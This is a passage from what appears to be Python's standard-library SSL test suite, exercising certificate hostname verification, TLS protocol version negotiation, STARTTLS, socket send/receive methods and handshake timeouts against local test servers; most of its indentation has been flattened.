server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
                cipher = s.cipher()[0].split('-')
                if s.version() != 'TLSv1.3':
                    # TLS 1.3 cipher suite names do not encode the key
                    # exchange/authentication algorithms.
                    self.assertEqual(cipher[:2], ['ECDHE', 'ECDSA'])
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
                self.assertEqual(cipher[:2], ['ECDHE', 'ECDSA'])
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
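        # wrap_socket() IDNA-encodes U-label hostnames, so server_hostname is
        # always reported back as the ASCII A-label.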
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@unittest.skipUnless(ssl.HAS_TLSv1_3, "Test needs TLS 1.3")
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
            # TLS 1.3 performs the client cert exchange after the handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(4)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
        # Client waits until the server is set up, then connects.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.options |= ssl.OP_NO_TLSv1_3
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
if IS_OPENSSL_1_1_1 and ssl.HAS_TLSv1_3:
self.assertEqual(s.version(), 'TLSv1.3')
elif ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
"test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
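        # With TLS 1.0-1.2 disabled on both sides (the client and server share
        # the same context here), the handshake can only negotiate TLS 1.3.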
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
# client 1.0 to 1.2, server 1.0 to 1.1
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
# client 1.0, server 1.2 (mismatch)
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1
with ThreadedEchoServer(context=server_context) as server:
